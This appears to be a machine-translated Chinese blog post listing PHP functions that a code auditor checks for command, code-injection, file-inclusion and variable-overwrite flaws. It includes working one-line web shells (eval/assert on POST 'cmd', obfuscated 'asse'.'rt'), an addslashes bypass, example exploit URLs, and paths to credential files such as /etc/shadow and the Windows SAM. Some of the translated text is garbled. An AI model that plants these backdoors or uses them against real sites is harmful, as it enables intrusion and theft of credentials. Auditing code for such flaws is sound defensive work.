PHP code audit - list of common sensitive functions in PHP

Language 2023-10-01 03:41:24 views: null

Article directory

Preface

      List of common sensitive functions in PHP.

1. Sensitive functions in PHP - command injection vulnerability

     1)exec()

      The command execution function executes an external program without displaying output.

<?php
	echo exec('whoami');
?>

     2)system ()

      The command executes a function, executes an external program, and displays the output.

<?php
	system('whoami');
?>

     3)passthru ()

      The command executes a function, executes an external program, and displays the raw output.

<?php
	passthru('whoami');
?>

     4)shell_exec ()

      Execute the command through the shell environment and return the complete output as a string. It is worth mentioning that this function has the same effect as the execution operator (backtick ``).

<?php
	echo shell_exec('whoami');
	echo "<br>";
	echo `whoami`;
?>

     5)popen() / proc_open()

      This function can also execute a string as an OS command, but this function returns a file pointer rather than the command execution result. This function has two parameters.

<?php
	$cmd = $_POST['cmd'].">> 1.txt";
	//此时的$cmd=ipconfig >> 1.txt
	popen("$cmd",'r'); //实际上就是 popen("ipconfig >> 1.txt", "r"),把执行结果放入1.txt文件,通过访问1.txt文件查看执行结果。

2. Sensitive functions in PHP - code injection vulnerabilities

     1)eval()

      This function calculates the string as a PHP code, and the string must be a legal PHP code and must end with a semicolon. The fputs function and the fopen function are used to transfer the information from Xiaoma to Malaysia .

# 没有被过滤
<?php @eval($_POST['cmd']);?>

# addslashes 过滤
# ${${}} 绕过
cmd=${
    
    ${
    
    phpinfo()}}

     2)assert()

      This function checks a specified assertion. Assertion is a logic vocabulary, mainly used by programmers to make hypothetical judgments. There are only two types of assertions, string or Boolean. When the assertion is false, a string expression is returned. If the assertion is a string, it will be executed as PHP code.

<?php @assert($_GET["cmd"]);?>
cmd=phpinfo();

     3)preg_replace()

      If the /e modifier is used in a regular rule, there is a code execution vulnerability. /e has been removed after version 7.0.

<?php	
	preg_replace("/test/e",$_POST["cmd"],"jutst test");
?>

     4)call_user_func()

      Call the first parameter as the callback function, and the subsequent parameters as the parameters of the callback function.

<?php
	# 传入的参数作为assert函数的参数
	call_user_func("assert",$_POST['cmd']);
?>

     5)call_user_func_array()

      Similar to this, except that the parameters passed in are arrays.

#将传入的参数作为数组的第一个值传递给assert函数
#cmd=system(whoami)
#菜刀连接密码:cmd
$cmd=$_POST['cmd'];
$array[0]=$cmd;
call_user_func_array("assert",$array);

     6)create_function()

      Create an anonymous function that returns a string with a unique function name, otherwise it returns false on error. It was removed after 7.0.

<?php
	$a = $_GET['a'];
	$func = create_function('$a','eval($a);');
	$func($a);
?>

     7)array_map()

      Apply the user-defined function to each value in the array and return the array with the new values ​​after the user-defined function is applied. The number of arguments the callback function accepts should match the number of arrays passed to the array_map() function.

#命令执行http://localhost/123.php?func=system   cmd=whoami
#菜刀连接http://localhost/123.php?func=assert   密码:cmd
$func=$_GET['func'];
$cmd=$_POST['cmd'];
$array[0]=$cmd;
$new_array=array_map($func,$array);
echo $new_array;

Insert image description here

     8)array_filter()

      Pass each value in the array to the callback function in turn. If the callback function returns true, the current value of the array array will be included in the returned result array. The key names of the array remain unchanged.

<?php 
	//?func=system&cmd=whoami
	$cmd=$_GET['cmd'];
	$array1=array($cmd);
	$func =$_GET['func'];
	array_filter($array1,$func);
?>

     9)usort() / uasort()

      usort() sorts an array using a user-defined comparison function.
      uasort() sorts the values ​​in an array using a user-defined comparison function and maintains index association.

php环境>=<5.6才能用
命令执行:http://localhost/123.php?1=1+1&2=eval($_GET[cmd])&cmd=system(whoami);
菜刀连接:http://localhost/123.php?1=1+1&2=eval($_POST[cmd])   密码:cmd
<?php
    usort($_GET,'asse'.'rt');
?>

Insert image description here

3. Sensitive functions in PHP - file inclusion vulnerability

      When using these four functions to include files, no matter what type the file is (picture, txt, etc.), it will be parsed directly as a PHP file.

     1)allow_url_include() 和allow_url_fopen()

allow_url_fopen = On (whether to allow remote files to be opened)
allow_url_include = On (whether to allow include/require remote files)

      When configured to on, it can directly include remote files. When include($var) exists and $var is controllable, the $var variable can be directly controlled to execute PHP code. The default is off after PHP5.2.0, and the configuration range is PHP_INI_ALL.

<?php
include $_GET['a'];
?>

     2)include()

      If include() makes an error, it will only issue a warning and continue executing subsequent statements.

     3)include_once()

      Similar to include, the only difference is that if the code in the file is already included, it will not be included again.

     4)require()

      reuqire() If there is an error during the inclusion process, such as the file does not exist, etc., it will exit directly without executing subsequent statements.

     5)require_once()

      Similar to require, the only difference is that if the code in the file is already included, it will not be included again

     6) PHP pseudo-protocol

  • php://input, utilization condition: allow_url_include= On. There is no requirement for allow_url_fopen. php://input is invalid when enctype="multipart/form-data".
  • php://filter, usage conditions: just reading, allow_url_fopen needs to be turned on, allow_url_include does not need to be turned on;
  • phar://, this parameter is a function of PHP to decompress the package. No matter what the suffix is, it will be decompressed as a compressed package. Conditions of use: PHP version is greater than or equal to PHP5.3.0
  • zip://, the zip pseudo-protocol is similar to the phar protocol. Conditions of use: PHP version is greater than or equal to PHP5.3.0
  • data://URI schema (for example: data:text/plain, data:text/plain), usage conditions: PHP version is greater than or equal to PHP5.2. allow_url_fopen = On; allow_url_include = On; similar to the input of the PHP pseudo-protocol, used when encountering file_get_contents();
  • file://, you can access the local file system through the file protocol and read the contents of the file.

     7) Common file inclusion paths

      windows:

  • C:\boot.ini // Check the system version
  • C:\windows\system32\inetsrv\MetaBase.xml // IIS configuration file
  • C:\windows\repair\sam // Store the password for the initial installation of the Windows system
  • C:\ProgramFiles\mysql\my.ini // MySQL配置
  • C:\ProgramFiles\mysql\data\mysql\user.MYD // MySQL root密码
  • C:\windows\php.ini // php configuration information
          Linux/Unix system:
  • /etc/passwd //Account information
  • /etc/shadow // Account password file
  • /usr/local/app/apache2/conf/httpd.conf // Apache2 default configuration file
  • /usr/local/app/apache2/conf/extra/httpd-vhost.conf // Virtual website configuration
  • /usr/local/app/php5/lib/php.ini // PHP related configuration
  • /etc/httpd/conf/httpd.conf // Apache configuration file
  • /etc/my.conf // mysql configuration file

4. Sensitive functions in PHP - file upload/write

     1) file_put_contents(): Write a string into the file (it will be automatically created if it does not exist).
     2) move_uploaded_file() : Move the temporarily uploaded file.
     3) rename: rename files/directories
     4) rmdir: delete directories
     5) mkdir: create directories
     6) unlink: delete files
     7) fopen/fputs/fwrite: open files or URLs

5. Sensitive functions in PHP - file reading/downloading

     1) file_get_contents(): Read the entire file into a string. This function is the preferred method for reading the contents of a file into a string.
     2) allow_url_fopen(): When this configuration is ON, it can read remote files. When fopen($ var) exists and the $ var variable is controllable, the variable can be directly controlled to SSRF. The default configuration of allow_url_fopen() is on, and the configuration scope is PHP_INI_SYSTEM.

<?php
fopen($_GET['a'],	'r');
?>

     3) Any file download keyword: download() with filepath or file

6. Sensitive functions in PHP - SQL injection

     1) SQL injection requires operating the database, so it generally looks for SQL statement keywords: insert, delete, update, select, and checks whether the passed variable parameters are user-controllable and whether they have been safely processed.

7. Sensitive functions in PHP - variable coverage

      Variable overwriting refers to replacing the original variable values ​​of the program with our customized parameter values. Generally, variable overwriting vulnerabilities need to be combined with other functions of the program to achieve a complete attack.
     1) $$: represents variable variables.

<?php
$var='hello';
$$var='world'; //$hello='world'
echo $var.'</br>';
echo $$var.'</br>';
echo $hello;
?>

Insert image description here
     2) extract(): Import variables from the array into the current symbol table.

<?php
$var="don9";
extract($_GET);
if($var == "sec"){
    
    
echo $var;
}
else echo $var;
?>

Before overwriting:
Insert image description here
After overwriting:
Insert image description here
     3) parse_str(): Parse the query string into variables.
     4) import_request_variables(): Import GET/POST/Cookie variables into the global scope (equivalent to turning on global variable registration), so if register_globals is disabled but you want to use some global variables, you can use this function.
     5) mb_parse_str(): Parse GET/POST/COOKIE data and set global variables.
     6) When Register_globals=ON, variables submitted through GET will be directly overwritten. This feature is deprecated as of PHP 5.3.0 and will be removed as of PHP 5.4.0.

8. Sensitive functions in PHP - dynamic functions

     1) When using dynamic functions, if the user has controllable variables, it can cause the attacker to execute arbitrary functions.

<?php
	$myfunc = $_GET['myfunc' font>];
	$myfunc();
?>

9. Sensitive functions in PHP - PHP environment settings

     1) open_basedir setting

      open_basedir can limit the directories that applications can access. Check whether open_basedir has been set. Of course, some are set through the web server, such as: apache's php_admin_value, nginx+fcgi controls php settings through conf.

     2) allow_url_fopen setting

      If allow_url_fopen=ON, then PHP can read remote files for operation, which can easily be exploited by attackers.

     3) allow_url_include setting

      If allow_url_include=ON, then php can include remote files, causing serious vulnerabilities.

     4) safe_mode_exec_dir setting

      This option can control the directory of external commands that can be called by PHP. If there are external commands called in the PHP program, then specifying the directory of the external commands can control the risk of the program.

     5) magic_quotes_gpc settings

      This option can escape special characters in submitted parameters. It is recommended to set magic_quote_gpc=ON. This feature is deprecated as of PHP 5.3.0 and will be removed as of PHP 5.4.0.

     6) register_globals setting

      Enabling this option will cause PHP to register all externally submitted variables as global variables, with serious consequences. This feature is deprecated as of PHP 5.3.0 and will be removed as of PHP 5.4.0.

     7) safe_mode setting

      safe_mode is an important security feature of PHP and is recommended to be turned on.

     8) session_use_trans_sid setting

      Enabling session.use_trans_sid causes PHP to pass the session ID through the URL, making it easier for an attacker to hijack the current session or trick the user into using an existing session that is already controlled by the attacker.

     9) display_errors setting

      If this option is enabled, PHP will output any error or warning information, which can be used by attackers to obtain sensitive information such as the web root path.

     10) disable_functions setting

      This directive allows you to disable certain classes for security reasons. Separate class names with commas). Disble Dass is not affected by safe mode. This directive can only be set in php.ini. For example, it cannot be set in ttpd.conf. When you want to use this directive to disable some dangerous functions, remember to add the dI() function to the banned list, because attackers can use the dI() function to load custom PHP extensions to break through the restrictions of the disable_functions directive.

Guess you like

Origin blog.csdn.net/qq_44029310/article/details/127078308
Recommended
wlnmp one-click installation package update 240522
ChatGPT was severely down and was rumored to have been hacked by Russian hackers.
Ranking
Java implementation Storage Structure queue
Android development Yabo Sports Start Tutorial
Let me catch it! There are a lot of interesting souls, not many interesting books, Redis in-depth adventure subverts your understanding of Redis
easyrecovery software 2024 free version computer file data recovery tool
Deep Understanding of Virtual Private Networks: How VPNs Connect the World
EOS was looted, not without reason
Construction of chromium GN system
Comprehensive summary of JAVA basic knowledge [New students must see and learn together]
Fall in love with [data structures] Quick Sort
OpenCV implements FAST algorithm corner point detection and ORB algorithm feature point detection
Daily
More
2024-05-22(9)
2024-05-21(35)
2024-05-20(5)
2024-05-19(0)
2024-05-18(31)
2024-05-17(6)
2024-05-16(23)
2024-05-15(5)
2024-05-14(9)
2024-05-13(8)

Code World

© 2018 codetd.com